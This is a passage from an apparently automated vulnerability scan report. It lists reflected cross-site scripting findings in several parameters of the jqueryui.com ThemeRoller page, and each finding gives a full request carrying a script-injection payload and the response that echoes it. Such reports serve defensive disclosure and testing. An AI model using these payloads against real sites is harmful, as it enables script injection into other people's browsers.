aaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:03 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120001

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.pnga07fc"><script>alert(1)</script>513a07b8f38&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=2222
...[SNIP]...

2.143. http://jqueryui.com/themeroller/ [bgTextureHighlight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94c1f"><script>alert(1)</script>2d0e22689aa was submitted in the bgTextureHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png94c1f"><script>alert(1)</script>2d0e22689aa&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:43 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120001

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
er=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png94c1f"><script>alert(1)</script>2d0e22689aa&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=c
...[SNIP]...

2.144. http://jqueryui.com/themeroller/ [bgTextureHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86eda"><script>alert(1)</script>c73d4e689a0 was submitted in the bgTextureHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png86eda"><script>alert(1)</script>c73d4e689a0&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:29 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120001

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
tent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png86eda"><script>alert(1)</script>c73d4e689a0&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconC
...[SNIP]...

2.145. http://jqueryui.com/themeroller/ [bgTextureOverlay parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ded2"><script>alert(1)</script>40818f3f47c was submitted in the bgTextureOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png3ded2"><script>alert(1)</script>40818f3f47c&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:59 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120001

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
olorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png3ded2"><script>alert(1)</script>40818f3f47c&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadi
...[SNIP]...

2.146. http://jqueryui.com/themeroller/ [bgTextureShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1acac"><script>alert(1)</script>4c0c01413e6 was submitted in the bgTextureShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png1acac"><script>alert(1)</script>4c0c01413e6&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:30:04 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120001

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png1acac"><script>alert(1)</script>4c0c01413e6&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

2.147. http://jqueryui.com/themeroller/ [borderColorActive parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d112"><script>alert(1)</script>4fec38c0b08 was submitted in the borderColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa5d112"><script>alert(1)</script>4fec38c0b08&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:38 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
tureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa5d112"><script>alert(1)</script>4fec38c0b08&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColor
...[SNIP]...

2.148. http://jqueryui.com/themeroller/ [borderColorContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2f4e"><script>alert(1)</script>5a653707aec was submitted in the borderColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaae2f4e"><script>alert(1)</script>5a653707aec&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:13 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
hlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaae2f4e"><script>alert(1)</script>5a653707aec&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dada
...[SNIP]...

2.149. http://jqueryui.com/themeroller/ [borderColorDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c13a5"><script>alert(1)</script>d8cd7804d63 was submitted in the borderColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3c13a5"><script>alert(1)</script>d8cd7804d63&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:24 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
1_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3c13a5"><script>alert(1)</script>d8cd7804d63&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextur
...[SNIP]...

2.150. http://jqueryui.com/themeroller/ [borderColorError parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57e33"><script>alert(1)</script>92863e6f3a7 was submitted in the borderColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a57e33"><script>alert(1)</script>92863e6f3a7&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:55 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a57e33"><script>alert(1)</script>92863e6f3a7&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&op
...[SNIP]...

2.151. http://jqueryui.com/themeroller/ [borderColorHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58ea6"><script>alert(1)</script>28e30971b21 was submitted in the borderColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa58ea6"><script>alert(1)</script>28e30971b21&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:05 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
hemeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa58ea6"><script>alert(1)</script>28e30971b21&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e
...[SNIP]...

2.152. http://jqueryui.com/themeroller/ [borderColorHighlight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
